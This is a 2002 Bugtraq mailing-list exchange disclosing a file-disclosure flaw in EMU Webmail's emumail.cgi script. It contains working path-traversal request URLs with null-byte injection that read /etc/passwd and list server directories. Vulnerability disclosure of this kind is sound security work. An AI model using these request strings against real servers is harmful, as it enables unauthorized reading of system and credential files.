u can also do this: http://site/emumail.cgi?type=/../../../../../etc/passwd%00 but u cannot do this: http://site/emumail.cgi?type=/../../../../../bin/ls%20/%00 /* * Andreas Constantinides (MegaHz) * Admin of cHp (www.cyhackportal.com) * */ ----- Original Message ----- From: "N|ghtHawk" <nighthawk@hackers4hackers.nl> To: <bugtraq@securityfocus.org> Sent: Friday, April 05, 2002 3:10 AM Subject: Re: emumail.cgi > >name : emumail.cgi > >date : 04/04/2002 > >description : EMU Webmail: how to check your email > >from the web. > >severity : Low/average-risk > >homepage : www.emumail.com > > > >Any user can view files on the remote system: > >xxx/PATH/emumail.cgi?type=FILE%00 > > > > > > > >The vendor were contact about that > > > > http://site/emumail.cgi?type=.%00 > > Seems to give the directory index of the current directory. > > http://site/emumail.cgi?type=..%00 > > Seems to give the directory index of ../ > > -- > N|ghtHawk > http://www.hackers4hackers.org > > > >
